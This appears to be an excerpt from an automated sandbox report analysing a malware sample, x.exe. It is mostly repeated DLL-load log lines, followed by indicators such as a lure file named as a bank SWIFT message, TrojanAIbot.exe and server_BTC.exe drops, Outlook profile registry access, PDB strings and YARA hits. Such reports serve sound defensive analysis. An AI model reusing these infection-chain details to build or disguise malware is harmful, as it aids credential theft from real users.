                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: TrojanAIbot.exe.lnk.12.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdStatic file information: File size 1224635 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 0000000A.00000003.2177333908.0000000025FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.2163239930.0000000021C78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2163239930.0000000021C4F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: Yara matchFile source: 4.2.x.exe.2b10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.4.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02B2894C
                      Source: Wisrysxl.PIF.8.drStatic PE information: real checksum: 0x0 should be: 0x136519
                      Source: armsvc.exe.10.drStatic PE information: real checksum: 0x32318 should be: 0x13d574
                      Source: neworigin.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x480db
                      Source: x.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x136519
                      Source: server_BTC.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: lxsyrsiW.pif.4.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                      Source: TrojanAIbot.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.7.drStatic PE information: section name: .didat
                      Source: armsvc.exe.10.drStatic PE information: section name: .didat
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3D2FC push 02B3D367h; ret 4_2_02B3D35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B163B0 push 02B1640Bh; ret 4_2_02B16403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B163AE push 02B1640Bh; ret 4_2_02B16403
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1332C push eax; ret 4_2_02B13368
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3C378 push 02B3C56Eh; ret 4_2_02B3C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1C349 push 8B02B1C1h; ret 4_2_02B1C34E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3D0AC push 02B3D125h; ret 4_2_02B3D11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2306B push 02B230B9h; ret 4_2_02B230B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2306C push 02B230B9h; ret 4_2_02B230B1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3D1F8 push 02B3D288h; ret 4_2_02B3D280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2F108 push ecx; mov dword ptr [esp], edx4_2_02B2F10D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3D144 push 02B3D1ECh; ret 4_2_02B3D1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B16782 push 02B167C6h; ret 4_2_02B167BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B16784 push 02B167C6h; ret 4_2_02B167BE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1D5A0 push 02B1D5CCh; ret 4_2_02B1D5C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B3C570 push 02B3C56Eh; ret 4_2_02B3C566
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1C56C push ecx; mov dword ptr [esp], edx4_2_02B1C571
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2AAE0 push 02B2AB18h; ret 4_2_02B2AB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B28AD8 push 02B28B10h; ret 4_2_02B28B08
